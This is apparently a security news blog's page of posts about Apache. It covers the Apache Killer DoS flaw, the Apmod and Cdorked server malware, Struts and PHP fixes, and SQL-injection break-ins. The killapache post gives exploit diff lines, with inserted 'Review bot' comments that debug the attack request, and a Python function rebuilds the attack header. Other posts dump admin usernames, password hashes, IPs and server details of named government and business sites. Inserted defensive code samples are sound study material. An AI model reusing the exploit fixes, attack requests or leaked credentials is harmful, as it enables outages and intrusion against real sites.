Showing posts sorted by relevance for query Apache.

Armageddon (DDoS Botnet) Started Integrating Apache Killer Exploit

The latest version of the Armageddon denial of service (DDoS) bot integrates a relatively new exploit known as Apache Killer. Armageddon is a Russian malware family designed exclusively to launch DDoS attacks. Because it is sold as a toolkit on underground forums, there is more than one Armageddon-powered botnet on the Internet. Aside from the Apache Killer exploit, the latest Armageddon version also incorporates other application-layer DDoS techniques that target popular Internet forum platforms such as vBulletin and phpBB; these, however, are not particularly ground-breaking.
The Apache Killer exploit was released in August 2011. It exploits a vulnerability in the Apache HTTP Server by sending a specially crafted "Range" header that lists a very large number of overlapping byte ranges, driving memory and CPU consumption up until the server can no longer respond. The attack is particularly dangerous because it can be carried out from a single computer and can leave the targeted machine so starved of memory that a reboot is needed to recover. The vulnerability is identified as CVE-2011-3192 and was patched in Apache HTTPD 2.2.20, less than two weeks after the exploit was publicly released. Apache 2.2.21 contains an improved fix.
Recommendation:-
System administrators should upgrade their Apache servers to the latest available version or implement the known workarounds published by the Apache Software Foundation, which drop or reject requests whose Range header carries more than a handful of ranges (five in the published configuration). There is also an update to the Apache mod_security module that attempts to address this type of attack by filtering requests with "Range" headers that are too large.

-Source (PC World)





Apache Web Server Under Stealth Attack

 
Online attackers love to exploit Web servers because, once in, they can add scripts that quickly and automatically insert malicious links into static HTML pages via an iframe tag, or code that attempts to exploit visitors' PCs via drive-by downloads. But an attack discovered on Friday, dubbed Apmod, takes this technique one step further by not just infecting static Web pages. "The attack was unusual in that the Web server itself was the infection target," said Cathal Mullaney, a security response engineer at Symantec, in a blog post. "When a Web server is infected like this, every user that requests any Web page from that Web server is a potential victim. This is opposed to cases where static Web pages are infected with malicious code: only those specific pages put a user at risk of infection."
This new attack, which has been seen in the wild but doesn't currently appear to be widespread, targets the popular Apache Web Server, which runs on Windows and Linux. According to Netcraft, Apache Web Server is now used to host about 204 million websites.
The attack is innovative in that it uses Apache's built-in filter capabilities. A filter, as defined by Apache, "is a process that is applied to data that is sent or received by the server," and can be used to add functionality without rewriting the code base. Many websites use this capability to add advertisements to Web pages on the fly, while also tracking that advertising delivery to generate revenue via ad agencies.
"We have discovered a malicious module that performs identical steps in order to include links to malicious websites," said Mullaney. "All of the actions performed by the rogue module are done using legitimate code provided by the Apache API, specifically for this type of on-the-fly content generation. This is not an exploit or a hack of Apache's code base; the module uses Apache's inherent functionality to infect users and attempts to redirect them to a malicious Web page."
Interestingly, the module does not attempt to infect every Web page it serves. It includes a number of anti-detection features: it watches for signs of administrator access or administrative processes, and it avoids serving malware to search engines. Furthermore, once it has served a page injected with links to malicious websites, the module temporarily blacklists the visitor's IP address so that it does not deliver multiple injected pages to the same client, which could make its activity easier to detect. It then queries a command and control server for a new iframe tag, further hampering detection.
As a result, "this is a complex and potentially difficult threat to detect accurately," said Mullaney. "As the rogue module contains a number of evasion techniques, it is possible that a system administrator would not notice the infection for some time. A further difficulty in detecting the threat is the on-the-fly nature of the infection. Since no Web pages are infected on the disk, no detections on stored HTML pages are possible."
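Because the rogue filter rewrites the response in memory, scanning the document root finds nothing; the usable signal is an element in the served page that the file on disk does not contain. The following is an added example written for this page (it is not Symantec's analysis code or the module itself) showing that comparison. The two HTML documents are constructed samples and bad.example is a placeholder host.

```python
"""Catch on-the-fly injection by comparing what is served with what is on disk.

Added example for this page, not Symantec's analysis code or the rogue module.
The two HTML documents below are constructed samples; bad.example is a
placeholder host name.
"""
from html.parser import HTMLParser
from typing import List, Tuple

LOADER_TAGS = {"iframe", "script", "embed", "object"}  # elements that pull remote content


class _LoaderCollector(HTMLParser):
    """Record (tag, source URL) for every element that can load remote content."""

    def __init__(self) -> None:
        super().__init__()
        self.found: List[Tuple[str, str]] = []

    def handle_starttag(self, tag, attrs):
        if tag in LOADER_TAGS:
            a = {k: (v or "") for k, v in attrs}
            self.found.append((tag, a.get("src") or a.get("data") or ""))


def remote_loaders(html: str) -> List[Tuple[str, str]]:
    """All remote-loading elements in a document, in order of appearance."""
    p = _LoaderCollector()
    p.feed(html)
    p.close()
    return p.found


def injected_elements(on_disk: str, served: str) -> List[Tuple[str, str]]:
    """Loader elements present in the served response but absent from the file on disk."""
    baseline = set(remote_loaders(on_disk))
    return [e for e in remote_loaders(served) if e not in baseline]


# Constructed sample: the file as it sits in the document root...
ON_DISK = """<html><head><title>Home</title>
<script src="/js/site.js"></script></head>
<body><p>Welcome</p></body></html>"""

# ...and the same page as a browser received it, with a hidden iframe appended by the filter.
SERVED = ON_DISK.replace(
    "</body>",
    '<iframe src="http://bad.example/in.php" width="1" height="1" '
    'style="visibility:hidden"></iframe></body>',
)

if __name__ == "__main__":
    print(injected_elements(ON_DISK, SERVED))  # [('iframe', 'http://bad.example/in.php')]
```

When fetching the served copy of a real site, use a browser-like User-Agent from an address that has not visited the site recently: as the passage notes, the module skips search engines and blacklists each IP after one injected response, so a second fetch from the same address will look clean. Legitimate per-request variation (ad slots) is handled by keeping the known loader sources in the on-disk baseline.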


Apache 2.2.20 Released (DDoS Vulnerability Fixed)


This afternoon the Apache Software Foundation released the awaited fix for the denial of service (DoS) vulnerability (CVE-2011-3192) reported a few days ago. The change in version 2.2.20 of the Apache httpd server limits the memory used by range requests: if the byte ranges requested add up to more than the size of the file, httpd ignores the Range header and returns the entire file. This follows closely on the heels of a tool released to the Full Disclosure mailing list this week that exploits the flaw. Apache web administrators are encouraged to apply this fix immediately. Unfortunately, as we see all too frequently, many Linux and Unix administrators "set and forget" their installations and never look after their servers again.
The Apache team should be applauded for testing and releasing an important security fix so quickly. Now it is up to you, the IT administrators who are using Apache, to follow through and apply these fixes.

For more information, and for the official Apache release notes and patches for this vulnerability, click Here

-News Source (NS & Apache)


Linux/Cdorked.A: One of The Most Sophisticated Apache Backdoor Targets Millions of Websites to Serve Blackhole Exploit

ESET, the security firm headquartered in Bratislava, has uncovered what it calls a malicious cyber rampage targeting millions of cPanel-based servers. For the last few months security researchers have been tracking server-level compromises that use malicious Apache modules to inject malware into websites and redirect some of their requests to the infamous Blackhole exploit kit. On cPanel-based servers, instead of adding modules or modifying the Apache configuration, the attackers have started to replace the Apache binary (httpd) with a malicious one. This new backdoor, dubbed Linux/Cdorked.A, is sophisticated and stealthy and is meant to drive traffic to malicious websites. According to ESET's official blog post, "Linux/Cdorked.A is one of the most sophisticated Apache backdoors we have seen so far. The backdoor leaves no traces of compromised hosts on the hard drive other than its modified httpd binary, thereby complicating forensics analysis. All of the information related to the backdoor is stored in shared memory. The configuration is pushed by the attacker through obfuscated HTTP requests that aren't logged in normal Apache logs. This means that no command and control information is stored anywhere on the system."
The campaign was first detected by another security firm, Sucuri, and later analysed in detail by ESET. It remains a serious matter, since thousands of websites have already been infected. The attack is particularly dangerous because Apache web servers are among the best-known and most widely used in the world and are run by numerous companies, so a successful compromise can affect many businesses across a diverse range of industries.
As Linux/Cdorked.A has already been spotted in the wild, we urge every concerned system administrator and security analyst to check their servers and verify that they are not affected by this threat. Detailed instructions for performing this check are provided in the ESET blog.
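The passage singles out two on-disk artefacts to look for: the replaced httpd binary (the only trace Cdorked leaves on disk) and, from the earlier campaigns, modules loaded from odd locations. Below is an added example written for this page, not ESET's or Sucuri's published procedure (the ESET post has the definitive steps), that checks both offline. The manifest, temporary files, configuration text and paths are all constructed for the demonstration.

```python
"""Offline integrity checks for an Apache host suspected of httpd tampering.

Added example for this page; not ESET's or Sucuri's procedure. The manifest,
temporary files, configuration text and module paths are constructed.
"""
import hashlib
import os
import re
import tempfile
from typing import Dict, List, Tuple


def sha256_of(path: str) -> str:
    """Streaming SHA-256 of a file."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_manifest(manifest: Dict[str, str]) -> Dict[str, str]:
    """Compare files against digests recorded at install time.

    manifest maps path -> expected sha256; the result maps path -> 'ok',
    'modified' or 'missing'.
    """
    result: Dict[str, str] = {}
    for path, expected in manifest.items():
        if not os.path.isfile(path):
            result[path] = "missing"
        elif sha256_of(path) == expected:
            result[path] = "ok"
        else:
            result[path] = "modified"
    return result


_LOADMODULE = re.compile(r"^\s*LoadModule\s+(\S+)\s+(\S+)", re.MULTILINE)


def foreign_modules(config_text: str, module_dir: str, server_root: str) -> List[Tuple[str, str]]:
    """LoadModule directives whose shared object lives outside module_dir.

    Relative object paths resolve against ServerRoot, as httpd does.
    """
    module_dir = os.path.normpath(module_dir)
    odd: List[Tuple[str, str]] = []
    for name, obj in _LOADMODULE.findall(config_text):
        full = os.path.normpath(obj if os.path.isabs(obj) else os.path.join(server_root, obj))
        if os.path.commonpath([full, module_dir]) != module_dir:
            odd.append((name, full))
    return odd


# Constructed config: two stock modules and one loaded from an odd location.
SAMPLE_CONF = """
ServerRoot "/etc/httpd"
LoadModule ssl_module modules/mod_ssl.so
LoadModule rewrite_module modules/mod_rewrite.so
LoadModule cache_module /var/tmp/.cache/mod_cache.so
"""


def demo_manifest_check() -> Dict[str, str]:
    """Build a throwaway 'install', record digests, tamper with one file, re-verify."""
    with tempfile.TemporaryDirectory() as root:
        httpd = os.path.join(root, "httpd")
        helper = os.path.join(root, "httxt2dbm")
        for p in (httpd, helper):
            with open(p, "wb") as f:
                f.write(b"\x7fELF placeholder for " + os.path.basename(p).encode())
        manifest = {p: sha256_of(p) for p in (httpd, helper)}  # taken at install time
        with open(httpd, "ab") as f:                            # attacker swaps the binary
            f.write(b"\x00backdoor")
        report = verify_manifest(manifest)
        return {os.path.basename(p): v for p, v in report.items()}


if __name__ == "__main__":
    print(demo_manifest_check())
    print(foreign_modules(SAMPLE_CONF, "/etc/httpd/modules", "/etc/httpd"))
```

On a real host the manifest should come from the package manager (rpm -V httpd, or debsums / dpkg --verify on Debian-derived systems) rather than from a digest file stored on the same box, which an attacker with root can rewrite. Since the text says Cdorked keeps its configuration in shared memory, also list the segments owned by the web server user with ipcs -m and account for each one.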






The Apache Struts 2.3.1.2 Released & Closes Remote Command Execution Vulnerability
The Apache Struts group today officially announced that Struts 2.3.1.2 is available as a "General Availability" release. It closes a critical hole in Struts versions 2.0.0 to 2.3.1.1 that allowed remote command execution. The vulnerability makes it possible to bypass the protection around OGNL, an expression language used for getting and setting properties of Java objects, so that arbitrary expressions are evaluated.

Brief About Apache Struts :-
Apache Struts 2 is an elegant, extensible framework for creating enterprise-ready Java web applications. The framework is designed to streamline the full development cycle, from building, to deploying, to maintaining applications over time.

This release includes an important security fix:
  • ParameterInterceptor vulnerability allowed remote command execution
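The generic control behind this fix is that a request parameter name may only address a property path and must never carry expression syntax. The following is an added example written for this page, not the Struts project's own ParametersInterceptor code: STRICT_NAME is my own pattern, not the regular expression Struts ships, PERMISSIVE_NAME is an illustrative pattern of the loose kind that lets expression characters through, and the sample parameter names are constructed.

```python
"""Allow-list request parameter names before they reach an expression evaluator.

Added example for this page, not the Struts project's interceptor code.
STRICT_NAME and PERMISSIVE_NAME are assumed patterns; the sample names are
constructed.
"""
import re
from typing import Dict, List, Tuple

IDENT = r"[A-Za-z_][A-Za-z0-9_]*"
# property, nested.property, list[0].field and nothing else
STRICT_NAME = re.compile(rf"{IDENT}(?:\.{IDENT}|\[\d+\])*")
# Assumed loose pattern: letters, digits, dots, brackets, parentheses, quotes, spaces
PERMISSIVE_NAME = re.compile(r"[A-Za-z0-9.\[\]()'_\s]+")


def accept_param_name(name: str, pattern=STRICT_NAME) -> bool:
    """True only if the whole name matches the allow-list pattern."""
    return pattern.fullmatch(name) is not None


def filter_params(params: Dict[str, str], pattern=STRICT_NAME) -> Tuple[Dict[str, str], List[str]]:
    """Split incoming parameters into those safe to bind and the names to log and drop."""
    accepted: Dict[str, str] = {}
    rejected: List[str] = []
    for name, value in params.items():
        if accept_param_name(name, pattern):
            accepted[name] = value
        else:
            rejected.append(name)
    return accepted, rejected


# Constructed request: two ordinary bindings and one name that is really an expression.
SAMPLE_PARAMS = {
    "user.name": "alice",
    "orders[0].quantity": "2",
    "z[(foo)('meh')]": "true",
}

if __name__ == "__main__":
    print(filter_params(SAMPLE_PARAMS))
    print(filter_params(SAMPLE_PARAMS, PERMISSIVE_NAME))  # the loose pattern lets the third name through
```

The point of the contrast is that characters such as parentheses, quotes, "#" and "@" have no business in a property path; a name containing them should be rejected and logged before the binding layer ever evaluates it.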

To Download The Apache Struts 2.3.1.2 Click Here




killapache Modified Exploit (DDOS Tool For Apache Web Server)


Earlier we talked about killapache (a DoS tool for the Apache web server). It was originally coded by Kingcope and has now been re-edited by "S4(uR4"; it still kills Apache, and many websites remain vulnerable.

Difference Between Old and New Modified Exploit:-
40c40
< $p = “HEAD / HTTP/1.1rnHost: $ARGV[0]rnRange:bytes=0-$prnAccept-Encoding: gziprnConnection: closernrn”; — > $p = “HEAD “.($ARGV[2] ? $ARGV[2] : “/”).”HTTP/1.1rnHost: $ARGV[0]rnRange:bytes=0-$prnAccept-Encoding: gziprnConnection: closernrn”;
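Review bot: the replacement line in 40c40 drops the space between the request path and the protocol: `"HEAD ".($ARGV[2] ? $ARGV[2] : "/")."HTTP/1.1..."` produces a request line such as `HEAD /HTTP/1.1`, which is malformed, so the server answers 400 before it ever looks at the Range header. Add the space the way the 56c56 change does (`." HTTP/1.1`).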

56c56
< $p = “HEAD / HTTP/1.1rnHost: $ARGV[0]rnRange:bytes=0-$prnAccept-Encoding: gziprnConnection: closernrn”; — > $p = “HEAD “.($ARGV[2] ? $ARGV[2] : “/”) .” HTTP/1.1rnHost: $ARGV[0]rnRange:bytes=0-$prnAccept-Encoding: gziprnConnection: closernrn”;
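Review bot: 56c56 is the second copy of the same request-building line, and the two copies already differ (this one has the space before HTTP/1.1, the one in 40c40 does not). Compute the path once when arguments are parsed and build the request string in one helper used from both places, so the copies cannot drift again.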

73c73
< if ($#ARGV > 1) {
> if ($#ARGV > 0) {
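Review bot: relaxing the check from `$#ARGV > 1` to `$#ARGV > 0` is consistent with the path argument becoming optional, but nothing validates `$ARGV[2]` before it is interpolated into the request line: a value containing whitespace or CR/LF changes the structure of the request, and a value not starting with `/` yields an invalid request-target. Require the path to match something like `^/\S*$` (or percent-encode it) and update the usage message to document the new optional argument. Note also that the `? :` test treats a path of `0` as absent.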

How the code works:-
As in the original script, killapache sends HEAD requests (the diff above shows the request line) whose Range header lists a very large number of overlapping byte ranges; Apache 2.2 builds a separate in-memory copy of the response for every range listed, so a single client can claim large portions of the machine's memory. A byte-range request lets a client fetch only part of a document, for example bytes 500 to 1000; download managers use it to resume interrupted downloads and it is meant to save bandwidth. Stating many overlapping ranges in one header, however, makes an Apache server exhaust its memory.
At the time of writing no patch had been released for this vulnerability, but a few workarounds, which we discussed in our previous post, have been published by The Apache Software Foundation and can be used until a stable fix is available. The vulnerability lies in the feature that lets you pause and resume downloads: if you have to stop downloading something part-way through, you can generally pick up where you left off rather than start again from scratch.

To Download the new version Click Here



DDoS Tool For Apache Server 2.3.14

After killapache's success, here is yet another proof of concept of a denial of service against Apache: an exploit for a DoS vulnerability in Apache HTTP Server 2.3.14, the latest release on the 2.3 development branch, which fails under the attack. The Egyptian hacker and exploit writer "Xen0n" discovered the vulnerability and wrote a Perl exploit for it; the script can be easily modified.

To Download POC Apache Server 2.3.14 Click Here



Oracle Issued Security Update of DDoS Vulnerability in Apache HTTPD



Oracle, the giant enterprise database company - and, of course, owner of the erstwhile Sun Microsystems - has just published an out-of-band security update. This is only the fifth time Oracle has issued an alert outside its routine quarterly patch cycle since introducing its own version of Patch Tuesday at the start of 2005.

Description:-
This security alert addresses the security issue CVE-2011-3192, a denial of service vulnerability in Apache HTTPD, which is applicable to Oracle HTTP Server products based on Apache 2.0 or 2.2. This vulnerability may be remotely exploitable without authentication, i.e. it may be exploited over a network without the need for a username and password. A remote user can exploit this vulnerability to impact the availability of un-patched systems.

Affected Products and Versions:-

  • Oracle Fusion Middleware 11g Release 1, versions 11.1.1.3.0, 11.1.1.4.0, 11.1.1.5.0
  • Oracle Application Server 10g Release 3, version 10.1.3.5.0 (Only affected when Oracle HTTP Server 10g based on Apache 2.0 has been installed from Application Server Companion CD)
  • Oracle Application Server 10g Release 2, version 10.1.2.3.0 (Only affected when Oracle HTTP Server 10g based on Apache 2.0 has been installed from Application Server Companion CD)


Please note that Oracle Enterprise Manager includes the Oracle Fusion Middleware component that is affected by this vulnerability. Oracle Enterprise Manager is affected only if the affected Oracle Fusion Middleware version (noted above) is being used. Since a vulnerability affecting Oracle Fusion Middleware versions may affect Oracle Enterprise Manager, Oracle recommends that customers apply the fix for this vulnerability to the Oracle Fusion Middleware component of Oracle Enterprise Manager. For information on what patches need to be applied to your environments, refer to Security Alert CVE-2011-3192 Patch Availability Document, My Oracle Support Note 1357871.1.

Patch Availability:-
Patches and relevant information for protection against this vulnerability can be found Here
Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply Security Alert fixes as soon as possible.

-News Source (Oracle)



Another DoS fix for Apache HTTP server


The update of the Apache HTTP Server (httpd) to version 2.2.18 earlier this month, which closed a denial of service (DoS) problem in the APR fnmatch code (CVE-2011-0419), appears to have introduced a related DoS vulnerability (CVE-2011-1928). The developers have now released httpd 2.2.19 to fix this new problem, which has been rated as moderately critical; as with the previous DoS vulnerability, it requires that mod_autoindex is enabled in the web server.
It appears that the updated Apache Portable Runtime (APR) 1.4.4, bundled with the server to correct the original denial of service vulnerability, could cause httpd workers to hang at 100% CPU when calling apr_fnmatch. APR 1.4.5, which resolves the issue, has been released by the APR developers and is bundled with Apache HTTP Server 2.2.19. Users can upgrade to httpd 2.2.19 or, if running httpd 2.2.17 or earlier, work around the denial of service problem by adding the IgnoreClient option to the IndexOptions directive (IndexOptions +IgnoreClient), which makes mod_autoindex ignore client-supplied query variables, including the patterns that reach apr_fnmatch. The problem was first noted and tracked on Debian mailing lists.
The developers also took the opportunity to fix an inadvertently changed function signature for ap_unescape_url_keep2f which had broken binary compatibility with some third party modules. The 2.2.19 update to httpd is available to download from the project's download page. The updated APR 1.4.5 is also available for download for developers who use the library in other projects.


DHS is Taking Anonymous More Seriously & Has Issued a Security Bulletin Warning of Upcoming Cyber Threats



The Department of Homeland Security is beginning to take Anonymous and other non-professional cyber-attackers more seriously as it issues a warning about potential attacks.
The United States Department of Homeland Security warned the security community about potential attacks from hacking collective Anonymous over the next few months. The Sept. 2 security bulletin from the DHS National Cyber-Security and Communications Integration Center warned financial services companies to be on the lookout for attackers operating under the Anonymous umbrella to "solicit ideologically dissatisfied, sympathetic employees" to the cause. The collective recently took to Twitter to persuade employees within the financial sector to hand over information and access to enterprise networks. Though such attempts may have been unsuccessful so far, "unwilling coercion through embarrassment or blackmail may be a risk to personnel," the DHS bulletin warned.
DHS issued the bulletin primarily for cyber-security professionals and staff in charge of protecting critical infrastructure. The bulletin also refers to new tools that Anonymous may use in future attacks. Anonymous has primarily been using the Low Orbit Ion Cannon, a simple stress-testing tool that floods a server with requests, to launch its distributed denial of service attacks. Some members have been working on a new JavaScript-based DDoS tool dubbed #RefRef.

The new attack tool is said to be capable of using the server's own resources and processing power to launch a denial of service attack against itself, but "so far it's unclear what the true capabilities of #RefRef are," the DHS said in the bulletin. The tool is slated to be released Sept. 17.
DHS also referenced the "Apache Killer" Perl script that can be used to launch denial of service attacks against Web servers running the popular Apache software. Apache developers released a patch earlier this week to fix the vulnerability in Apache 2.2. Administrators have been urged to patch their servers immediately.

The DHS also mentioned three cyber-attacks and civil protests Anonymous has already announced. "Occupy Wall Street" is the first scheduled one, for Sept. 17. Announced by a group Adbusters in July and actively supported by Anonymous, the goal is to get 20,000 individuals to gather on Wall Street to protest various U.S. government policies. Similar rallies targeting financial districts are being planned in Madrid, Milan, London, Paris and San Francisco.
Another protest in October, also led by Adbusters, is scheduled to be held at the Washington, D.C. National Mall to mark the 10th anniversary of the war in Afghanistan. There is also the supposed Nov. 11 attack against Facebook and Project Mayhem, scheduled for Dec. 21, 2012, DHS warned. There are indications that Project Mayhem would be a combination of physical disruption and targeting of information systems.

The bulletin itself is unusual in that DHS hasn't commented on the activities of Anonymous ever since the group stepped up its efforts over the past few months, attacking federal agencies and private corporations to protest a wide range of issues. As anyone following the security space undoubtedly knows, there have been at least one or two attacks by Anonymous, even more, each week for the past few months, so the bulletin may be just stating the obvious when warning of future potential attacks.
"Anonymous has shown through recently reported incidents that it has members who have relatively more advanced technical capabilities who can also marshal large numbers of willing, but less technical, participants for DDOS activities," the DHS said.

-News Source (e-Week)


killapache (DDOS Tool For Apache Web Server)

A previously unknown flaw in the code for processing byte range headers allows versions 2.2.x of the Apache Web Server to be crippled from a single PC. An "Apache Killer" Perl script impressively demonstrates the problem. The issue has been assigned CVE-2011-3192 as its CVE identifier.

How killapache Works:-

killapache sends HEAD requests carrying a Range header with a very large number of byte ranges (the released script asks for one open range followed by some 1300 overlapping ranges). A byte-range request lets a client fetch only part of a document, for example bytes 500 to 1000; it is normally used when downloading large files, so that programs such as download managers can resume interrupted transfers, and it is meant to reduce bandwidth use. Apache 2.2, however, builds a separate in-memory copy of the response for every range listed, so a header with hundreds of overlapping ranges makes the server claim large portions of the system's memory and CPU until it stops responding.
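The following is an added example written for this page, serving both this explanation and the "How the code works" paragraph in the modified-exploit post above; it is not code from the killapache script, KillApachePy or the Apache project. build_request reproduces the shape of the header the script sends (one open range followed by many overlapping ones) so the cost is visible, and screen_range_header is the check a reverse proxy or WAF can apply: it combines the Apache workaround's rule (refuse a header with more than a few ranges; the cap of 5 is an assumption matching the published configuration) with the 2.2.20 rule (ranges that add up to more than the file are ignored and the whole file is sent). The host name is a placeholder.

```python
"""The Apache Killer request and a front-end screen for it (CVE-2011-3192).

Added example for this page, not code from killapache, KillApachePy or the
Apache project. MAX_RANGES and the host name are assumptions.
"""
import re
from typing import List, Optional, Tuple

MAX_RANGES = 5  # assumption: same cap as the published SetEnvIf/RewriteCond workaround


def killapache_range_value(n: int = 1300) -> str:
    """Header value in the script's shape: 'bytes=0-,5-0,5-1,...,5-(n-1)'."""
    return "bytes=0-," + ",".join(f"5-{i}" for i in range(n))


def build_request(host: str, path: str = "/", n: int = 1300, method: str = "HEAD") -> bytes:
    """Raw request line and headers as a stress client would put them on the wire."""
    return (
        f"{method} {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Range: {killapache_range_value(n)}\r\n"
        "Accept-Encoding: gzip\r\n"
        "Connection: close\r\n\r\n"
    ).encode("ascii")


_SPEC = re.compile(r"^\s*(\d*)\s*-\s*(\d*)\s*$")


def parse_ranges(value: str) -> List[Tuple[Optional[int], Optional[int]]]:
    """Parse 'bytes=a-b,c-d,...' into (start, end) pairs; None marks an open side."""
    if not value.lower().startswith("bytes="):
        raise ValueError("unsupported range unit")
    out: List[Tuple[Optional[int], Optional[int]]] = []
    for spec in value[len("bytes="):].split(","):
        m = _SPEC.match(spec)
        if not m or (m.group(1) == "" and m.group(2) == ""):
            raise ValueError(f"malformed range spec {spec!r}")
        out.append((int(m.group(1)) if m.group(1) else None,
                    int(m.group(2)) if m.group(2) else None))
    return out


def requested_bytes(ranges, file_size: int) -> int:
    """Total bytes the ranges would produce for a file of file_size bytes."""
    total = 0
    for start, end in ranges:
        if start is None:                       # suffix range: last `end` bytes
            total += min(end, file_size)
        else:
            last = file_size - 1 if end is None else min(end, file_size - 1)
            total += max(0, last - start + 1)   # start > end (e.g. 5-0) is unsatisfiable
    return total


def screen_range_header(value: str, file_size: int, max_ranges: int = MAX_RANGES) -> str:
    """'allow' the header, 'drop' it (serve the whole file) or 'reject' the request."""
    try:
        ranges = parse_ranges(value)
    except ValueError:
        return "reject"
    if len(ranges) > max_ranges or requested_bytes(ranges, file_size) > file_size:
        return "drop"
    return "allow"


if __name__ == "__main__":
    print(len(build_request("target.test")), "bytes of headers for one request")
    print(screen_range_header(killapache_range_value(), 100000))  # drop
```

Dropping (rather than rejecting) an over-long Range header is what the official workaround does, so legitimate download managers still get the file, just without resumption. The per-range memory cost the exploit depends on is what 2.2.20 removed; until a server is upgraded, this screen keeps a single client from asking for 1300 copies of one file.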

To download the Killapache Perl file Click Here


PHP 5.3.11 & PHP 5.4.1 With Apache 2.4 support, Debug info Handler

A couple of months ago we got PHP 5.3.10, a release that closed some serious security holes (denial of service and remote code execution). Now the PHP development team has announced the immediate availability of PHP 5.3.11 and PHP 5.4.1. These releases focus on improving the stability of the current PHP branches with over 60 bug fixes, some of them security related.
Brief About PHP:- PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML.

Security Enhancements for both PHP 5.3.11 and PHP 5.4.1:
  • Fixed bug #54374 (Insufficient validating of upload name leading to corrupted $_FILES indices). (CVE-2012-1172).
  • Add open_basedir checks to readline_write_history and readline_read_history.
Security Enhancement affecting PHP 5.3.11 only:
  • Fixed bug #61043 (Regression in magic_quotes_gpc fix for CVE-2012-0831).
Key enhancements in these releases include:
  • Added debug info handler to DOM objects.
  • Fixed bug #61172 (Add Apache 2.4 support).
For a full list of changes in PHP 5.3.11 and PHP 5.4.1, see the ChangeLog. For source downloads please visit our downloads page, Windows binaries can be found on windows.php.net/download/. All users of PHP are strongly encouraged to upgrade to PHP 5.3.11 or PHP 5.4.1.




British Chamber of Commerce & Ministry of Culture and Tourism Indonesia Hacked By TEAM T!g3R


TEAM T!g3R found a vulnerability on the official websites of the Ministry of Culture & Tourism, Indonesia and the British Chamber of Commerce, Indonesia.
Vulnerable Website:-
http://www.budpar.go.id
http://www.britcham.or.id
 
Vulnerability:-
SQL-i
TEAM T!g3R also got into the databases of these two websites and exposed sensitive data such as server details, DB name, user name, password and admin details.

Ministry of Culture & Tourism Indonesia:-
Admin Details:-
user       pass
admin     d3affb50918890deaf19360c7c?1d28
dadi       1601642654c68e2b?975be78915c8c7e

Database Name:-
Current DB:- budpar
Current DB:- information_schema

Web-Server:- Apache/2.2.14 (Fedora)
Hack Proof:-
For More information Click Here

British Chamber of Commerce Indonesia:-
Server Details:-
Target:-                 http://www.britcham.or.id
Host IP:-                202.67.9.74
Web Server:-         Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.17
Powered-by:-          PHP/5.2.17
DB Server:-            MySQL
Resp. Time(avg):-   2744 ms
Current User:-        britcham_user1@localhost
Sql Version:-           5.0.51a-community
Current DB:-           britcham_database
System User:-         britcham_user1@localhost
Host Name:-           asterix.serverku.com
Installation dir:-    /
DB User:-               'britcham_user1'@'localhost'
Admin Details:-
Data Found: user_name=britcham
Data Found: user_password=0b176060ef08c8d37d8aa756075c52ad
Data Found: user_id=1
Data Found: user_name=admin
Data Found: user_password=admin
Data Found: user_id=1

Hack Proof:-
For More information Click Here





Kerala State Social Welfare Dept & Advocate General Rajasthan Are Vulnerable to SQL-i


The official websites of the Kerala State Social Welfare Department and the Advocate General of Rajasthan are vulnerable to SQL injection. Both are Indian government sites. The vulnerability was found by Moofster.

Kerala state social welfare dept:
Vulnerable Website:-  http://www.keralawomen.gov.in/
Host IP: 74.220.207.96
Web Server: Apache
Powered-by: PHP/5.2.17


Advocate General Rajasthan:
Host IP: 210.212.105.51
Web Server: Apache/2.2.3 (Red Hat)
Powered-by: PHP/5.1.6

Admin details:
Data Found: password=0192023a7bbd73250516f069df18b500 (admin123 in plaintext)
Data Found: user_name=administrator
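The administrator hash above, like the 32-hex-digit hashes in the earlier dumps, is unsalted MD5, which is why the poster could name its plaintext. The following is an added example written for this page, not the attackers' tooling: the first half checks that hash against a tiny constructed guess list (a real attempt uses wordlists of millions of entries plus mangling rules, which is exactly why the scheme fails), and the second half shows the replacement, a per-user salt with an iterated hash (PBKDF2-HMAC-SHA256 from the standard library). The iteration count is a chosen parameter, not a value from the page.

```python
"""Why an unsalted MD5 password hash is as good as plaintext, and the replacement.

Added example for this page, not the attackers' tooling. DUMPED_HASH is the
hash printed in the post above; GUESSES and ITERATIONS are constructed/chosen.
"""
import hashlib
import hmac
import os
from typing import Dict, Iterable, Optional


def crack_md5(targets: Iterable[str], candidates: Iterable[str]) -> Dict[str, Optional[str]]:
    """Map each target hash to the candidate that produces it, or None."""
    table = {hashlib.md5(c.encode("utf-8")).hexdigest(): c for c in candidates}
    return {t: table.get(t.lower()) for t in targets}


ITERATIONS = 200_000  # chosen so one verification costs tens of milliseconds on the server


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Return 'pbkdf2_sha256$<iterations>$<salt hex>$<digest hex>' with a fresh random salt."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


# Constructed demonstration input: the hash from the post and a short guess list.
DUMPED_HASH = "0192023a7bbd73250516f069df18b500"
GUESSES = ["password", "admin", "welcome1", "admin123"]

if __name__ == "__main__":
    print(crack_md5([DUMPED_HASH], GUESSES))   # {'0192023a...': 'admin123'}
    stored = hash_password("admin123")
    print(verify_password("admin123", stored), verify_password("admin124", stored))
```

With the salted scheme two users with the same password get different stored values, so a precomputed table is useless, and each guess costs ITERATIONS hash operations instead of one; the weak password itself is still weak, which is why a length and lockout policy belongs alongside the hash.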


KillApachePy [Python version of Apache Killer]


Previously we talked about killapache, the DoS exploit that can take down a vulnerable Apache web server from a single attacking machine. Recently Miroslav Štampar, one of the co-authors of the excellent sqlmap tool, wrote a Python variant of the same attack with a few more options and called it KillApachePy.
